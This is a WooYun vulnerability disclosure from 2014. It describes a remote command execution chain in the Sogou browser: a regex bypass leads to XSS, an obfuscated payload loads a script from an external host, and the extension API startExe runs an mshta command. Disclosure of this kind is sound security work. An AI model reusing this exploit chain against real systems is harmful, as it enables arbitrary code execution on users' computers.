当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-084110

漏洞标题:治标不治本:搜狗浏览器继续远程执行任意命令

相关厂商:搜狗

漏洞作者: gainover

提交时间:2014-11-21 14:06

修复时间:2015-02-19 14:08

公开时间:2015-02-19 14:08

漏洞类型:远程代码执行

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-11-21: 细节已通知厂商并且等待厂商处理中
2014-11-24: 厂商已经确认,细节仅向厂商公开
2014-11-27: 细节向第三方安全合作伙伴开放
2015-01-18: 细节向核心白帽子及相关领域专家公开
2015-01-28: 细节向普通白帽子公开
2015-02-07: 细节向实习白帽子公开
2015-02-19: 细节向公众公开

简要描述:

20分都不给我,好坏好坏好坏的。
先修复,再确认,修复发布浏览器更新了,但又修不好,哪来的自信给我5分。
修复方案:
请修复“厂商回复”中每次都自动回复“感谢支持,欢迎您在SGSRC平台提交漏洞”的漏洞。

详细说明:

1. 更新到最新版本

1.jpg


2. 搜狗针对上一个漏洞,做了一些修复,最根本的协议跳转限制依然没修复。
A. 针对signin.html的XSS做了如下图所示修复:

2.jpg


正则看似写的一大串,很复杂,实则: 连限定开始的 ^ 都落掉了,
直接 javascript:alert(1);//http://www.baidu.com/ 就绕过正则了
B. 当顶层的URL不是 se-extension:// 时,扩展API的调用会有限制, 但是当前URL为se-extension://时,依然可以调用扩展API。
因此,我们虽然无法用iframe来进行嵌入调用,但是结合
location.href 和 window.open,依然可以执行命令,代码如下:
首先location.href跳转到 signin.html的XSS页面:

location.href='se-extension://ext-1055834318/signin.html?app=test&code=javascript:document.write("<img src%3D1 onerror%3Deval(String.fromCharCode(119,105,110,100,111,119,46,115,61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,41,59,119,105,110,100,111,119,46,115,46,115,114,99,61,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,49,54,44,49,49,54,44,49,49,50,44,53,56,44,52,55,44,52,55,44,49,50,48,44,49,49,53,44,49,49,53,44,49,49,54,44,52,54,44,49,49,53,44,49,48,53,44,49,49,48,44,57,55,44,57,55,44,49,49,50,44,49,49,50,44,52,54,44,57,57,44,49,49,49,44,49,48,57,44,52,55,44,49,49,50,44,49,49,49,44,57,57,44,52,55,44,49,49,53,44,49,49,49,44,49,48,51,44,49,49,49,44,49,49,55,44,52,54,44,49,48,54,44,49,49,53,41,43,34,63,34,43,77,97,116,104,46,114,97,110,100,111,109,40,41,59,100,111,99,117,109,101,110,116,46,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,119,105,110,100,111,119,46,115,41))>");//http://www.baidu.com/';


执行XSS后,调用sogou.js, sogou.js代码如下:

window.w=parent.window.open("se-extension://ext740107210/html/back.html");
function load(){
	if(window.w&&window.w.document.getElementById("embed1")){
		clearTimeout(window.xx);
		window.w.document.getElementById("embed1").startExe("mshta javascript:(new/**/ActiveXObject('WScript.Shell').run('calc.exe'));window.moveTo(-1000,-1000);window.close();",function(){console.log(arguments)});
	}
};
window.xx=setInterval(function(){load();},100);


利用window.open打开se-extension://ext740107210/html/back.html,然后通过返回的窗口对象,调用document.getElementById("embed1").startExe,即可执行任意命令。
具体效果见漏洞证明

漏洞证明:

访问: http://xsst.sinaapp.com/poc/sogouxxx.html

3.jpg

修复方案:

请修复“厂商回复”中每次都自动回复“感谢支持,欢迎您在SGSRC平台提交漏洞”的BUG。

版权声明:转载请注明来源 gainover@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2014-11-24 18:48

厂商回复:

您好,感谢支持,我们会尽快修复

最新状态:

暂无